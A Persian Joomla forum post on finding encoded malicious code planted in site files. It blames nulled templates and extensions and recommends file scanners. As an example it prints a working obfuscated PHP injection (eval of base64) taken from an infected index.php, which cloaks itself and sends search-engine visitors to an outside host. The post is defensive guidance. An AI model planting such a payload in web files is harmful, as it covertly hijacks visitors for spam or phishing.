پارس جوم :: انجمن های تخصصی جوملا

نسخه‌ی کامل: یافتن کدهای مخرب و کد شده که توسط هکرها در فایل ها جاسازی میشوند
شما در حال مشاهده‌ی نسخه‌ی متنی این صفحه می‌باشید. مشاهده‌ی نسخه‌ی کامل با قالب بندی مناسب.
درود
گاهی سایت شما مورد حمله قرار میگیرد و یا اینکه هکر فقط از آن سوء استفاده میکند مثلا برای ارسال اسپم یا گرفتن بازدید و لینک دادن به سایتهای دلخواه و یا از همه بدتر برای فیشینگ.

در این تاپیک من مواردی رو که خودم دیدم برای شما توضیح میدهم چون در پارس جوم هاست گاهی با این موارد روبرو میشویم لازم دونستم برای دوستان هم توضیح بدم.
گاهی شما سایتتون رو بررسی میکنید و چندین فایل مشکوک را یافته و حذف میکنید و مطمئن میشوید سایت ایمن شده درصورتی که پیدا کردن تمامی کدها و فایل ها تقریبا غیرممکن خواهد بود و یا به سختی انجام پذیر است.

مشکل از کجا آغاز میشود ؟

مشکل ابتدایی احساس زرنگی ماست وقتی میبینیم در سایت هایی مانند جوملا فور یو یا تم اوکی و... هرچه افزونه تجاری نیاز داریم موجود است و سفارش سایت میگیریم و با استفاده از این افزونه و قالب ها برای مشتری سایت راه اندازی میکنیم و متاسفانه تمام کسانی هم که در اینترنت مشغول فروش قالب ها و بسته های نصبی فارسی شده هستند از همین قالب ها استفاده میکنند و چون معمولا کد هم میکنند مشکل را دو چندان میکنند و براحتی کدهای مخرب جاسازی شده در فایل ها توسط منتشر کننده را برای او کد میکنند و تحویل شما میدهند.البته من یک نفر را دیدم که قالب هارو از سازنده میخره و ترجمه میکنه و میفروشه ولی خوب من نه کسی رو تایید میکنم و نه رد میکنم ولی چون همون بسته هارو بچه ها روی سرور ما استفاده میکنند با مشکلاتشون روبرو شدم.

مشکل دیگر عدم رعایت موارد امنیتی ابتدایی است که برخی دوستان براش وقت نمیزارند که در مورد افزایش ایمنی مطالب زیادی در انجمن و نت هست.
توجه داشته باشید بعد از نصب جوملا و بالا آوردن سایت حتما باید سئو را فعال کنید چون بعد از معرفی به گوگل و یا شناسایی سایت شما توسط گوگل به سرعت لینک های شما در گوگل ایندکس میشود و هکرها با جستجوی لینک های مشکل دار براحتی سایت شمارا پیدا میکنند برای مثال اونها آدرس را به صورت زیر تایپ میکنند :

کد:
index.php/com-content/...

خوب حالا چند نمونه از کدهایی که در فایل ها کپی میشوند را براتون مثال میزنم.در فایل index.php یکی از سایتهای آلوده کد زیر در ابتدای فایل قرار داده شده بود :

کد:
<?php                                                       eval(base64_decode("CgplcnJvcl9yZXBvcnRpbmcoMCk7CiRxYXpwbG09aGVhZGVyc19zZW50KCk7CmlmICghJHFhenBsbSl7​CiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsKJHVhZz0kX1NFUlZFUlsnSFRUUF9VU0VS​X0FHRU5UJ107CmlmICgkdWFnKSB7CmlmIChzdHJpc3RyKCR1YWcsIk1TSUUiKSl7CnByZWdfbWF0Y2gg​KCIvbXNpZSAoWzAtOS5dKykvaSIsJHVhZywkbXYpOwppZiAoaXNzZXQoJG12WzFdKSl7CiRtdj1zdHJf​cmVwbGFjZSgiLiIsIiIsJG12WzFdKTsKfQp9CmlmKCFwcmVnX21hdGNoKCIvXjY2XC4yNDlcLi8iLCRf​U0VSVkVSWydSRU1PVEVfQUREUiddKSl7CmlmIChzdHJpc3RyKCR1YWcsIk1TSUUiKSBhbmQgJG12Pj05​MCl7CmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvby4iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5n​LiIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSkgewppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgYW5k​ICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpIGFuZCAhc3RyaXN0cigkcmVmZXJlciwiRWVZcDNENyIp​KXsKaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2dzYm5jbS5lcGFjLnRvLyIpOwpleGl0KCk7Cn0KfQp9​Cn0KfQp9"));

وقتی شما از نرم افزارهای متن باز استفاده میکنید وجود هرگونه متن کد شده مشکوک است و اکثر هکرها کدهاشن رو به روش بالا کد میکنند و اگر دقت کنید base64 میبینید.شما میتونید این کد رو حذف کنید و فایل رو ذخیره کنید.
در سایتی که من این کد را برای مثال برای شما قرار دادم بیش از 3500 فایل حاوی کدهایی که کد شده هستند وجود دارید و حالا بشینید حساب کنید طراحی مجدد سایت بصرفه تره یا بررسی همه فایل ها و مطابقت اونها با فایل اوریجینال.

خوب اگر مایل بودید سایتتون رو بررسی کنید باید چه بکنید چون آنتی ویروس سرور اینگونه فایل هارو پیدا نمیکنه !
اگر روی سرور cxs یا همون نرم افزار آنتی شل ConfigServer eXploit Scanner نصب باشد میتونید از مدیر سرور یا هاستینگ درخواست کنید که سایت شما را اسکن کند و گزارش آن را برای شما ارسال کند.
البته ذکر کنید که هنگام اسکن Deep scan و Display md5sum را هم تیک بزند تا کدهای درون فایل ها هم بررسی شوند.

وقتی شما کار رو از ابتدا درست شروع نکنید سایت شما مانند یک پارک برای هکرها میشود که هروقت دلشون میخواد میان و میرن البته همیشه هاستینگ ها موارد ایمنی رو رعایت میکنند و تنظیمات و نرم افزارهای مورد نیاز رو استفاده میکنند اما هرچقدر هم که سرور ایمن باشه باز وقتی خود مدیر سایت حجم وسیعی از فایل ها و کدهای مخرب مخفی رو دائما استفاده میکنه نتیجه کار معلومه.

خوب سایت دیگری که قبلا هم من معرفی کردم سایت myjoomla.com است که میتونید در آن عضو شوید و پلاگینی که بهتون میده نصب کنید و سایتتون رو بررسی کنید البته این سایت فقط فایل های اصلی جوملارو با نسخه اوریجینال تطابق میده و تغییرات را به شما گزارش میکند.

نتیجه اینه که اگر برای سایتتون و مشتری ارزش قائل هستید از افزونه و قالب های وارز استفاده نکنید و یا از خرید قالب های ترجمه شده و کد شده اجتناب کنید چون در اینصورت راهی برای یافتن مشکل نخواهد بود.

برای تهیه افزونه های اوریجینال راههای زیادی است.میتونید سفارش بدید براتون خریداری بشه و معمولا با پورسانت کمی براتون خریداری میکنند و یا بصورت جمعی خرید کنید که خرید بصورت جمعی مناسب تر خواهد بود.
درآخر اگر در پارس جوم هاست سرویسی دارید میتونید درخواست کنید تا براتون سایت شما را اسکن و گزارش آن را به ایمیل شما ارسال کنم.البته این درخواست فقط از طریق ارسال تیکت در پارس جوم هاست قابل اجرا خواهد بود.

وجود فایل های شبیه نام های فایل های موجود و یا فایل های اچ تی اکسز در پوشه های مختلف و یا پوشه ای با پیشوند ماژول در پوشه ماژول ها مانند mod_msn و یا هر نامی که برای شما آشنا نیست مشکوک است و باید بعد از بررسی حتما حذف شود.برخی هکرها پوشه ای درست میکنند و شما وقتی بازش میکنید میبینید فایل های xml و php و.. وجود دارد در صورتی که آنها ساختگی هستند و برای گمراه کردن شما ایجاد شده اند.
موفق باشید
لینک مرجع